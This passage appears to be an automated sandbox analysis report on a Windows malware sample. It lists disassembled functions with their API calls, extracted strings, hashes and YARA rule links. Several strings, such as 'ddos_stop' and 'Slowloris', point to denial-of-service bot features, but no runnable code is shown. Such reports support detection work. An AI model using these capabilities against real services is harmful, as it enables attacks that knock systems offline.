                                                                                                                                                        • String ID: )K7~$Unknown ReparseTag in boost::filesystem::read_symlink$boost::filesystem::read_symlink$da\$da\
                                                                                                                                                        • API String ID: 1553520704-476608602
                                                                                                                                                        • Opcode ID: 0898e0dd01fb22b3febdfcaf7afacfae8ba6a13ba5ea08bb0a01785536a12325
                                                                                                                                                        • Instruction ID: d2d9be2689bac63acf4830bc6876970ce1b9c329a119ab01c08524181d89f15f
                                                                                                                                                        • Opcode Fuzzy Hash: 0898e0dd01fb22b3febdfcaf7afacfae8ba6a13ba5ea08bb0a01785536a12325
                                                                                                                                                        • Instruction Fuzzy Hash: B751D171904209AEDB14EBD0DC46FBEBB79FB54714F50005DF912A71C2EB78AA04CBA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00414D11, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 132COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00414D16
                                                                                                                                                        • VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000003), ref: 00414D99
                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000002,00000000), ref: 00414DAA
                                                                                                                                                        • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,?,00000000,00000000), ref: 00414E00
                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,00000000), ref: 00414E0D
                                                                                                                                                          • Part of subcall function 0041046E: __EH_prolog.LIBCMT ref: 00410473
                                                                                                                                                        • new.LIBCMT ref: 00414E4B
                                                                                                                                                        • new.LIBCMT ref: 00414E64
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$CompletionConditionCreateErrorInfoLastMaskPortVerifyVersion
                                                                                                                                                        • String ID: iocp$IA
                                                                                                                                                        • API String ID: 1196141489-1642127137
                                                                                                                                                        • Opcode ID: b0f3246ead77c7689afcd01ab0d67d730d4016a9fd52e566d56f7d59da4e6cbc
                                                                                                                                                        • Instruction ID: 038c8f07e64acd417a65f5bc7aef818a56c2b5239a28710b74be9449e2c5509c
                                                                                                                                                        • Opcode Fuzzy Hash: b0f3246ead77c7689afcd01ab0d67d730d4016a9fd52e566d56f7d59da4e6cbc
                                                                                                                                                        • Instruction Fuzzy Hash: D7517BB0901244DFDB14DF69C88579EBFF4AF55310F1081AEE858AB382C7B88A44CB91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00414884, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 66COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00414889
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 004148A9
                                                                                                                                                          • Part of subcall function 0040F331: ___std_exception_copy.LIBVCRUNTIME ref: 0040F358
                                                                                                                                                          • Part of subcall function 0041CD28: __EH_prolog.LIBCMT ref: 0041CD2D
                                                                                                                                                          • Part of subcall function 0041CD28: __CxxThrowException@8.LIBVCRUNTIME ref: 0041CD7B
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL ref: 004148DA
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL ref: 00414922
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 00414943
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalH_prologSectionstd::exception::exception$EnterException@8LeaveThrow___std_exception_copy
                                                                                                                                                        • String ID: Invalid service owner.$Service already exists.$>A$>A
                                                                                                                                                        • API String ID: 479834926-2055121031
                                                                                                                                                        • Opcode ID: ef6a05605f391c6dce385709d7bea56575594f655a0a972a661ad9726dfa3e86
                                                                                                                                                        • Instruction ID: 1912cb68cf49eb22a32907775ec93aacb183c84b1b81127304af0ca5568ca7ef
                                                                                                                                                        • Opcode Fuzzy Hash: ef6a05605f391c6dce385709d7bea56575594f655a0a972a661ad9726dfa3e86
                                                                                                                                                        • Instruction Fuzzy Hash: 7C217E70901608DFCB10DF64C9856DEBBF0FF15314F2481AED8456B282D775AE49CBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004153BC, Relevance: 15.2, APIs: 10, Instructions: 242COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004153C1
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 004153EA
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 0041544C
                                                                                                                                                        • SetLastError.KERNEL32(00000000,00000000,?,00000000), ref: 0041545E
                                                                                                                                                        • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415476
                                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 0041547F
                                                                                                                                                        • __ExceptionPtrCopy.LIBCPMT ref: 0041553B
                                                                                                                                                        • __ExceptionPtrCopy.LIBCPMT ref: 0041554C
                                                                                                                                                        • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 004155CB
                                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 004155D5
                                                                                                                                                          • Part of subcall function 004152B4: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 004152DB
                                                                                                                                                          • Part of subcall function 004152B4: GetLastError.KERNEL32 ref: 004152E5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$CompletionQueuedStatus$CopyCriticalExceptionPostSection$EnterH_prologLeave
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4011970719-0
                                                                                                                                                        • Opcode ID: 3cf5315401eb3d5143f399373043416beba5d93d4323d1337df3a1362f0f602d
                                                                                                                                                        • Instruction ID: 7290affd22a57e4542e8205bc75613427f0ee98cdde122a9be2dcbcb5fb5e355
                                                                                                                                                        • Opcode Fuzzy Hash: 3cf5315401eb3d5143f399373043416beba5d93d4323d1337df3a1362f0f602d
                                                                                                                                                        • Instruction Fuzzy Hash: 4E918AB1D01219DFCF15DFA8C844AEEBBB9FF88310B14416AE815EB201D7389985CF91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00428862, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 249COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00428867
                                                                                                                                                        • new.LIBCMT ref: 00428885
                                                                                                                                                          • Part of subcall function 0049E34F: __EH_prolog.LIBCMT ref: 0049E354
                                                                                                                                                          • Part of subcall function 004AB0A0: __EH_prolog.LIBCMT ref: 004AB0A5
                                                                                                                                                          • Part of subcall function 004AB0A0: std::exception::exception.LIBCONCRT ref: 004AB164
                                                                                                                                                          • Part of subcall function 004AB0A0: __CxxThrowException@8.LIBVCRUNTIME ref: 004AB191
                                                                                                                                                          • Part of subcall function 0049E4CA: __EH_prolog.LIBCMT ref: 0049E4CF
                                                                                                                                                          • Part of subcall function 0049E4CA: new.LIBCMT ref: 0049E51C
                                                                                                                                                          • Part of subcall function 0049E81D: __EH_prolog.LIBCMT ref: 0049E822
                                                                                                                                                        • _strlen.LIBCMT ref: 00428A02
                                                                                                                                                          • Part of subcall function 0045D4EA: __EH_prolog.LIBCMT ref: 0045D4EF
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$DeallocateException@8Throw_strlenstd::_std::exception::exception
                                                                                                                                                        • String ID: allocator_${"xml":{"block":[{${"xml":{"block":{$}]}}$}}}
                                                                                                                                                        • API String ID: 1519558710-3049038541
                                                                                                                                                        • Opcode ID: 92ec6278e4315b16ff04dd24f7781e025368c2c4bb5ac5e6968e717aa21a0e40
                                                                                                                                                        • Instruction ID: ab97b9e7ba85fb5d1002f0125655c064219a554ddf5e7334edceca5d4e444bae
                                                                                                                                                        • Opcode Fuzzy Hash: 92ec6278e4315b16ff04dd24f7781e025368c2c4bb5ac5e6968e717aa21a0e40
                                                                                                                                                        • Instruction Fuzzy Hash: 77A1D471D01248EFEF15EBA9D946BEDBBB0AF15304F50409EE40577282EB781B48CB96
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00544DE6, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 183COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00544DEB
                                                                                                                                                        • _strlen.LIBCMT ref: 00544EA8
                                                                                                                                                          • Part of subcall function 0051E077: __EH_prolog.LIBCMT ref: 0051E07C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$_strlen
                                                                                                                                                        • String ID: ($Invalid type info$Some of required function pointers (is_instance, release, read or write) are NULL$Type name should contain only letters, digits, - and _$Type name should start with a letter or _$cvRegisterType
                                                                                                                                                        • API String ID: 1490583215-3333454738
                                                                                                                                                        • Opcode ID: 1a1a06d2a949fc44be661034546e8647bdf91370f536eee8b74e7d6b55221729
                                                                                                                                                        • Instruction ID: 4b19a72476af100ce37b93e65ba1c3599d3effa8552718779b56a150e5f9e92f
                                                                                                                                                        • Opcode Fuzzy Hash: 1a1a06d2a949fc44be661034546e8647bdf91370f536eee8b74e7d6b55221729
                                                                                                                                                        • Instruction Fuzzy Hash: F061F371C4434CEADB24EF94C945BEEBBB8BF14304F60415EE501A7292EB745B4ACB92
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0069F206, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetConsoleCP.KERNEL32(00000000,?,?,?,?,?,?,?,?,0069F97B,00000003,?,00000000,?,00000003,0000000C), ref: 0069F248
                                                                                                                                                        • __fassign.LIBCMT ref: 0069F2C3
                                                                                                                                                        • __fassign.LIBCMT ref: 0069F2DE
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 0069F304
                                                                                                                                                        • WriteFile.KERNEL32(?,00000000,00000000,0069F97B,00000000,?,?,?,?,?,?,?,?,?,0069F97B,00000003), ref: 0069F323
                                                                                                                                                        • WriteFile.KERNEL32(?,00000003,00000001,0069F97B,00000000,?,?,?,?,?,?,?,?,?,0069F97B,00000003), ref: 0069F35C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                        • String ID: )K7~
                                                                                                                                                        • API String ID: 1324828854-2802557318
                                                                                                                                                        • Opcode ID: 0bff8264e004f373d5ec92f976c96b9fb7d22514e0c740fe49b3edd32826fa52
                                                                                                                                                        • Instruction ID: 38a0491873d40675f241dda7afe992ea42844f7661563bf7f20e06f30d2a6d26
                                                                                                                                                        • Opcode Fuzzy Hash: 0bff8264e004f373d5ec92f976c96b9fb7d22514e0c740fe49b3edd32826fa52
                                                                                                                                                        • Instruction Fuzzy Hash: 5451A2719002099FDF10CFA8DC45AEEBBFAEF09310F15816AE551E7651E734D941CBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00416578, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 103libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0041657D
                                                                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 004165B3
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004165BA
                                                                                                                                                        • GetLastError.KERNEL32 ref: 004165CF
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(00000018), ref: 0041664B
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(00000018), ref: 00416679
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$AddressEnterErrorH_prologHandleLastLeaveModuleProc
                                                                                                                                                        • String ID: CancelIoEx$KERNEL32
                                                                                                                                                        • API String ID: 3905279128-434325024
                                                                                                                                                        • Opcode ID: a71ac3f215ce180a89ae34b43675de2005a6eaff6a76780a42a51a26d670a940
                                                                                                                                                        • Instruction ID: 6d50c487a22238e8c2160ca6c9a4e672368bc2a2d5f1676de36c5eed0a259208
                                                                                                                                                        • Opcode Fuzzy Hash: a71ac3f215ce180a89ae34b43675de2005a6eaff6a76780a42a51a26d670a940
                                                                                                                                                        • Instruction Fuzzy Hash: DA31B171900219EFCF00DF69C8449EEBBB5BF48314F05412EE855A7280CB78D941CBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0049F910, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 77COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0049F915
                                                                                                                                                        • std::locale::_Init.LIBCPMT ref: 0049F92D
                                                                                                                                                          • Part of subcall function 0057BBA4: __EH_prolog3.LIBCMT ref: 0057BBAB
                                                                                                                                                          • Part of subcall function 0057BBA4: std::_Lockit::_Lockit.LIBCPMT ref: 0057BBB6
                                                                                                                                                          • Part of subcall function 0057BBA4: std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 0057BBC9
                                                                                                                                                          • Part of subcall function 0057BBA4: std::locale::_Setgloballocale.LIBCPMT ref: 0057BBD1
                                                                                                                                                          • Part of subcall function 0057BBA4: _Yarn.LIBCPMT ref: 0057BBE7
                                                                                                                                                          • Part of subcall function 0057BBA4: std::_Lockit::~_Lockit.LIBCPMT ref: 0057BC25
                                                                                                                                                        • new.LIBCMT ref: 0049F968
                                                                                                                                                          • Part of subcall function 004218B2: __EH_prolog.LIBCMT ref: 004218B7
                                                                                                                                                          • Part of subcall function 004218B2: __Getcvt.LIBCPMT ref: 004218EE
                                                                                                                                                        • std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 0049F99C
                                                                                                                                                          • Part of subcall function 0057BD14: __EH_prolog3.LIBCMT ref: 0057BD1B
                                                                                                                                                          • Part of subcall function 0057BD14: new.LIBCMT ref: 0057BD22
                                                                                                                                                          • Part of subcall function 0057BD14: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0057BD39
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0049F9B4
                                                                                                                                                          • Part of subcall function 0057B602: __EH_prolog3.LIBCMT ref: 0057B609
                                                                                                                                                          • Part of subcall function 0057B602: std::_Lockit::_Lockit.LIBCPMT ref: 0057B613
                                                                                                                                                          • Part of subcall function 0057B602: Concurrency::cancel_current_task.LIBCPMT ref: 0057B646
                                                                                                                                                          • Part of subcall function 0057B602: std::_Lockit::~_Lockit.LIBCPMT ref: 0057B6B9
                                                                                                                                                        • _Yarn.LIBCPMT ref: 0049F9C8
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Lockitstd::_std::locale::_$Locimp::_$H_prologH_prolog3LocimpLockit::_Lockit::~_$New_Yarn$AddfacConcurrency::cancel_current_taskGetcvtInitLocimp_Setgloballocale
                                                                                                                                                        • String ID: H4J$j4J
                                                                                                                                                        • API String ID: 934797631-538168533
                                                                                                                                                        • Opcode ID: c6bd21ad936581c8128dbf472898d0a1e22613b9d06197e42a6d4cb21bd867f8
                                                                                                                                                        • Instruction ID: b983045c751d55addd12a40cf139ccbd6cb917d7d65721fea23db6559486fc10
                                                                                                                                                        • Opcode Fuzzy Hash: c6bd21ad936581c8128dbf472898d0a1e22613b9d06197e42a6d4cb21bd867f8
                                                                                                                                                        • Instruction Fuzzy Hash: 6E31F470905284DBEF14EF68D48579DBFF4EF14304F10819EE4089B283D7B84A04CBA6
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004178C9, Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 427COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004178CE
                                                                                                                                                          • Part of subcall function 00449F62: __EH_prolog.LIBCMT ref: 00449F67
                                                                                                                                                          • Part of subcall function 00449F62: GetTickCount64.KERNEL32 ref: 00449F8D
                                                                                                                                                          • Part of subcall function 00449F62: GetTickCount.KERNEL32 ref: 00449F95
                                                                                                                                                        • __aulldiv.LIBCMT ref: 00417987
                                                                                                                                                          • Part of subcall function 0041D101: __EH_prolog.LIBCMT ref: 0041D106
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                          • Part of subcall function 0041D156: __Thrd_sleep.LIBCPMT ref: 0041D1E9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$Tick$CountCount64DeallocateThrd_sleep__aulldivstd::_
                                                                                                                                                        • String ID: 7$T-x$d,x$ddos_stop$l-x
                                                                                                                                                        • API String ID: 3197615647-3838538590
                                                                                                                                                        • Opcode ID: 2511ac4bd97cd7665a9a71e2efc01ab0c152de8a0990509d79df325fd267b9fa
                                                                                                                                                        • Instruction ID: 11b054f6e64009eafcbfdaafa55f093147c87a3916369a88001dba251e256448
                                                                                                                                                        • Opcode Fuzzy Hash: 2511ac4bd97cd7665a9a71e2efc01ab0c152de8a0990509d79df325fd267b9fa
                                                                                                                                                        • Instruction Fuzzy Hash: 0D02F370D0125CEADB10EB68DD45BEEBBB89F16308F20809EE04577192DB781F85CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004F20E3, Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 261COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004F20E8
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 004F2111
                                                                                                                                                          • Part of subcall function 0040F331: ___std_exception_copy.LIBVCRUNTIME ref: 0040F358
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004F2130
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionException@8H_prologRaiseThrow___std_exception_copystd::exception::exception
                                                                                                                                                        • String ID: A09E667F3BCC908B$Error: Invalid character found: $Error: input string of odd length.$Ltm
                                                                                                                                                        • API String ID: 281195438-2915550526
                                                                                                                                                        • Opcode ID: edfb7b07315d5dc95bc5aa66e71b7c4401eb2ee68a26695e585c6673bc2310ca
                                                                                                                                                        • Instruction ID: 775aabe94de56ca674a97ca29dfa9aaaee089f8e7f896efff2266c8bba067a5c
                                                                                                                                                        • Opcode Fuzzy Hash: edfb7b07315d5dc95bc5aa66e71b7c4401eb2ee68a26695e585c6673bc2310ca
                                                                                                                                                        • Instruction Fuzzy Hash: 74A1C870A04649DFDB21CE98CB80679FBB1EB06300F2444AFD78197252C7F99986D75E
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00419C3D, Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 219COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00419C41
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00419C4C
                                                                                                                                                          • Part of subcall function 00414332: std::_Throw_Cpp_error.LIBCPMT ref: 0041433D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Cpp_errorExceptionException@8H_prologRaiseThrowThrow_std::_
                                                                                                                                                        • String ID: <$T-x$_<$_<$|,x
                                                                                                                                                        • API String ID: 2912727603-2884244383
                                                                                                                                                        • Opcode ID: e34de949c09c1d0cfca88fab658e6098b0f0a4ec7f32bc4c8a4b13f96ba0a1a5
                                                                                                                                                        • Instruction ID: 150cf6062b6b4b974066e9df20dccb097f65b60a0c1ed05d823ba1971c1ea4c6
                                                                                                                                                        • Opcode Fuzzy Hash: e34de949c09c1d0cfca88fab658e6098b0f0a4ec7f32bc4c8a4b13f96ba0a1a5
                                                                                                                                                        • Instruction Fuzzy Hash: 0C81B17190024CAADB04DFE9D851BEDBBB8AF14304F20826FF515A71A1DB781E85CB65
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041A254, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 198COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041A258
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0041A263
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DeallocateExceptionException@8H_prologRaiseThrowstd::_
                                                                                                                                                        • String ID: Slowloris$T-x$V$`$|,x
                                                                                                                                                        • API String ID: 2218394418-2896922012
                                                                                                                                                        • Opcode ID: 8b73ae6aaa749414bc9ad725c5b21389a5a3108b105cd6c9fcb40048b67cf0af
                                                                                                                                                        • Instruction ID: 456a2efcc7df4aac0332b5f5e7fd2908ba31bd5b6d614b574298451caae9b6a3
                                                                                                                                                        • Opcode Fuzzy Hash: 8b73ae6aaa749414bc9ad725c5b21389a5a3108b105cd6c9fcb40048b67cf0af
                                                                                                                                                        • Instruction Fuzzy Hash: 4D71A07194024CAEDB14EFE5D851BEEBBB8EF14304F10422FF505A7291DBB81A85CB65
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041A510, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 197COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041A514
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0041A51F
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DeallocateExceptionException@8H_prologRaiseThrowstd::_
                                                                                                                                                        • String ID: %$'$Keep-alive$T-x$|,x
                                                                                                                                                        • API String ID: 2218394418-3505708564
                                                                                                                                                        • Opcode ID: e58d0a32cfa884978cbf14ba34de20588ab755754a28ed9f737ae7aeda00da7a
                                                                                                                                                        • Instruction ID: c6d47d4c4639933ad259d32ef3d8376bf90d0b726f61928fb68829b040a4d496
                                                                                                                                                        • Opcode Fuzzy Hash: e58d0a32cfa884978cbf14ba34de20588ab755754a28ed9f737ae7aeda00da7a
                                                                                                                                                        • Instruction Fuzzy Hash: DE71B17190124CEEDB14EFE9D841BEEBBB8AF04304F10422FF505A7291DBB85A85CB65
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004B4664, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 116COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004B4669
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 004B4750
